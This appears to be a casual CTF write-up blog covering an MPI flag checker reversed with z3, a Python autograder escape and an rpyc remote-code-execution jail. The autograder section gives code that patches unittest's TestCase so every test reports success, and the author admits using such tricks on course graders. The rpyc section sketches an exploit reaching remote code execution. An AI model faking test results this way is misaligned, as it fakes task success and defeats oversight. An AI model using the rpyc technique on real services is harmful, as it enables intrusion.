+everyones just burnt out from organizing sapling lmao so im just looking at easy challs myself too
+
+* * *
+
+ngl this one is just reading MPI docs lmao
+
+i didnt have mpirun set up, so i just ended up statically reversing the entire thing
+
+which wasnt that bad actually - theres only really 3 functions in question:
+ - first reads the flag as the root process, scrambles it, and then scatters it to the rest of the processes via `MPI_Scatter`
+ - at first glance i thought the second one was just an artificial delay of some sort since all it does is basically just send and recv then sync up, but on a closer look its actually swapping the scattered pieces between processes
+ - third one gathers the flag back and checks it against a string as the root process, and does nothing in the other processes (rough sketch of the whole shape right after this list)
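+
+for reference, the overall shape in mpi4py terms looks something like this - purely a sketch, the scramble, chunk math and swap schedule below are placeholders and not whats actually in the binary:
+
+```py
+# rough mpi4py rendition of the three functions above - scramble(), the chunk sizes and
+# the swap schedule are made-up placeholders, not what the challenge binary actually does
+from mpi4py import MPI
+
+scramble = lambda b: b   # stand-in for whatever shuffle the binary applies
+comm = MPI.COMM_WORLD
+rank, size = comm.Get_rank(), comm.Get_size()
+
+# (1) root reads + scrambles the flag, then MPI_Scatter hands each process an equal chunk
+chunks = None
+if rank == 0:
+    flag = scramble(list(open("flag.txt", "rb").read()))
+    chunks = [flag[i * 64 // size:(i + 1) * 64 // size] for i in range(size)]
+piece = comm.scatter(chunks, root=0)
+
+# (2) the "delay" function: pairwise sendrecv, i.e. processes swap their pieces around
+partner = rank ^ 1   # made-up schedule
+piece = comm.sendrecv(piece, dest=partner, source=partner)
+
+# (3) root gathers everything back and checks it against the string baked into the binary
+gathered = comm.gather(piece, root=0)
+if rank == 0:
+    print(bytes(sum(gathered, [])) == b"<64-byte target from the binary>")
+```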
+
+so its just a matter of rewriting the program in python without all the interprocess communication overhead then
+
+except i kept brainfarting and somehow thought `#!py print("".join(['m_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3{Ptsu9i}13Es4V73M4_ans'[s[i]] for i in range(64)]))` would give me the correctly inverted flag if `s` is the array of scrambled indices lmao
+
+then i went down a rabbit hole figuring out where exactly i did the swapping wrong, scrutinizing every single detail in the MPI docs and trying out like 4 different variations of my swapping, from doing it in parallel to making a multidimensional array, just to make sure im not making arithmetic mistakes on the array indices
+
+and then i finally gave up and used z3 which instantly spewed out the flag :clown:
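+
+the z3 part is really just "declare the flag bytes as symbols, run the scramble forward on them, assert the result equals the target" - something like this, where `scramble` and `target` are stand-ins for my python reimplementation of the binary's logic and the string it compares against:
+
+```py
+from z3 import BitVec, Solver, sat
+
+# stand-ins: scramble() should be the reimplementation of the binary's scatter/swap logic
+# and target the 64-char string it compares against - both faked here for illustration
+scramble = lambda b: b[::-1]
+target = "A" * 64
+
+flag = [BitVec(f"f{i}", 8) for i in range(64)]
+s = Solver()
+for out_byte, want in zip(scramble(flag), target):
+    s.add(out_byte == ord(want))
+
+assert s.check() == sat
+m = s.model()
+print(bytes(m[v].as_long() for v in flag).decode())
+```
+
+which conveniently sidesteps the entire which-direction-does-the-permutation-go question that sent me down that rabbit hole in the first place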
+
+* * *
+
+eyo something familiar to me lets go?? ~~totally not something ive been doing to my own courses' autograders~~
+
+except this one is highkey easier than the hurdles prairielearn and the like bring me through tho lmao
+
+we get arbitrary leaks just by returning the value (albeit truncated), and theres no restrictions on whatever imports we need
+
+so logically the first thing to do is to traverse the stack, since apparently all of these autograders basically run in the same process for some reason lol
+
+~~like interprocess communication and isolation between graders and runners wouldve been a much better design choice to prevent grade modifications but ok~~
+
+anyways it seems like most of the useful variables are in the frame two levels up, so after a lot of `str(inspect.currentframe().f_back.f_back.f_globals.keys())[:64]`, `[64:128]`, `[128:192]`... to leak the data out in chunks and get around the truncation i mentioned before, i finally...
+
+got fed up with the inefficiency :upside_down:
+
+which funnily enough is also when i saw `_common_shorten_repr` which sounds suspiciously like its responsible for the truncation
+
+and so nooping it i go: `#!py inspect.currentframe().f_back.f_back.f_globals['_common_shorten_repr'] = lambda *str: str`
+
+originally i guessed `#!py lambda str: str`, but that ended up spewing arcane errors about the format string not having enough parameters lmao so i just made it vararg instead
+
+and ey i was correct - now we can leak things much faster than having to stitch together chunks across multiple runs
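+
+so putting the two tricks together, every leak becomes a single submission - something like this, where `solve` is just a stand-in name for whatever function the grader actually calls on our code:
+
+```py
+import inspect
+
+def solve():  # stand-in for the graded entrypoint
+    g = inspect.currentframe().f_back.f_back.f_globals   # the frame with all the grader globals
+    g['_common_shorten_repr'] = lambda *args: args       # noop the repr truncation
+    return str(g.keys())                                 # now comes back in one piece
+```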
+
+the next thing that caught my eye is `TestCase` - this is just from the builtin `unittest` module aint it
+
+for it to be here it probably means they are using it to run the tests, so what if we just make all the assertions on it succeed
+
+and with code along these lines
+```py
+# TestCase is just python unittests, we can set assert* to True to pass all assertions
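+# (sketch of that idea - the frame depth and names come from the leak above, the rest is assumed)
+import inspect
+g = inspect.currentframe().f_back.f_back.f_globals
+for name in dir(g['TestCase']):
+    if name.startswith('assert'):
+        # every assertEqual/assertTrue/... becomes a noop that always "passes"
+        setattr(g['TestCase'], name, lambda *args, **kwargs: True)
+```
+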
+except a lot of the other test cases are still complaining about wrong format lmao, so just nooping the assertions isnt enough - we need to noop the entire test case
+
+after reading up on how `TestCase` works for a bit i realized all test cases have to go through the `run` entrypoint
+
+so what if we just noop that instead
+
+turns out its slightly more complicated than just a `lambda res: None` lmao - we need to get the actual test cases, which subclass `util.TestCase`, and also set the `TestResult` object to success
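+
+so the run-nooping ends up shaped something like this - a sketch only, the grader-specific wiring (where exactly `TestCase` lives, how results get collected) is assumed:
+
+```py
+# find every subclass of the grader's TestCase and swap run() for one that just
+# marks the test as passed in the TestResult without actually running anything
+import inspect
+g = inspect.currentframe().f_back.f_back.f_globals
+base = g['TestCase']
+
+def fake_run(self, result=None):
+    if result is not None:
+        result.startTest(self)
+        result.addSuccess(self)
+        result.stopTest(self)
+    return result
+
+for case in base.__subclasses__():
+    case.run = fake_run
+```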
+
+* * *
+
+even tried to nudge rpyc to send the code to remote, to no avail lol
+```py
+class metatest(type):
+    def __add__(self, b):
+        import subprocess
+        breakpoint()  # if its local i will see it instantly on my current terminal - just for ease of local debugging since cwd is the same for server and client and its hard to tell
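+        return subprocess.check_output("id")   # placeholder command - the point is just to see where this runs
+
+# the idea, sketched: build a class from this metaclass and hand it to the remote service,
+# hoping __add__ ends up running on the remote when it does the addition (e.g. via conn.root.add(test, test))
+class test(metaclass=metatest):
+    pass
+```
+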
+coz i thought what if they only accounted for normal usage of functions, so cases like this would trick remote into calling the local versions of the objects instead of netrefs - but no, thats not how it works
+
+so since it seems like normal use cases wont be able to trigger code execution on remote its time to dig deep into the src
+
+it turns out theres a netref class in `netref.py` that basically proxies all remote objects' functions back to remote through a few handlers in `protocol.py`
+
+which means all local references execute on local - on remote they just become a netref, so the call bounces right back to run the code on local (and vice versa: all remote references stay in remote land, but we cant really get at remote references since getattr is locked down)
+
+since it seems like there aint much we can do with the netrefs themselves, i started digging deep into the protocol handlers, which all seemed pretty secure in the `DEFAULT_CONFIG` sense - until i found `HANDLE_CMP` which just called `#!py return getattr(type(obj), op)(obj, other)` for some reason
+
+so i started thinking whether theres any attr we can leak that would help us leak more, which *also* has the property of accepting 2 parameters - and it turns out `__getattr__` does exactly that
+
+except `__getattr__` actually just bounces everything back into local - BUT `__getattribute__` DOES get the local attributes specified in the `LOCAL_ATTRS` dict, which includes most of the useful things like `__class__` and `__dict__`
+
+now we can finally get our hands on remote references that arent normally exposed to us as netrefs, and once we have them we should be able to stay in remote land
+
+we still need to keep using this vulnerable `getattr` method instead of directly `obj.attr`ing (which would go through the secure `HANDLE_GETATTR` handler), but the idea stays the same as most basic pyjails
+
+with that, we can get arbitrary code execution on remote, and the flag: `dice{pyj41l_w1th_4_tw15t}`
+
+```py
+import rpyc
+from rpyc.core import consts
+
+#the idea is that once you get a remote reference, you can stay in remote land since all calls will be directed back to remote
+#however getting that remote reference in the first place is quite annoying since most useful attributes are either blocked or local
+#and theres not really a way to differentiate between those unless you dive into rpyc src
+#also any local references (e.g. import os; os.system is a local reference that will end up running on our local machine; a local definition of a class with modified __add__ to trick remote to run will also not work since it will bounce back to local when we do conn.root.add())
+#will end up bouncing back to local so the entrypoint has to be conn.root since that's the only remote reference at start
+
+def remote_getattr(obj, name):
+    #abuses the fact that CMP is the only one that doesnt have a secure check but directly uses getattr
+    #also abuses the fact that __getattribute__ bypasses netref calls for certain local attrs so we dont bounce back to client
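+    # a minimal sketch of the body: fire the CMP handler by hand with op="__getattribute__",
+    # so the remote side runs obj.__getattribute__(name) and hands us back a netref to the real attribute
+    return obj.____conn__.sync_request(consts.HANDLE_CMP, obj, name, '__getattribute__')
+
+conn = rpyc.connect("localhost", 1337)   # placeholder host/port
+
+# from here its the usual pyjail walk, just going through remote_getattr at every step - e.g. a
+# hypothetical chain (the actual path depends on how the service is structured):
+#   cls = remote_getattr(conn.root, '__class__')
+#   init_globals = remote_getattr(remote_getattr(cls, '__init__'), '__globals__')
+#   ...then pull __builtins__ out of that and open()/exec() things on the remote side
+```
+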
+also unrelated: wsl port forward messed with my local/remote debug setup apparently lmao
+
+and it seems like rpyc requires the same (major?) version on both ends to run correctly? i was on 5.1.0 which just kept giving me connection closed by peer
+
+this bug is apparently patched in the version i had in my python installation, so im just glad i got stuck connecting to remote and downgraded to 4.1.0 before digging into the src lmao
+
+or else i'd probably be malding over how theres no entrypoints for me to exploit at all kekw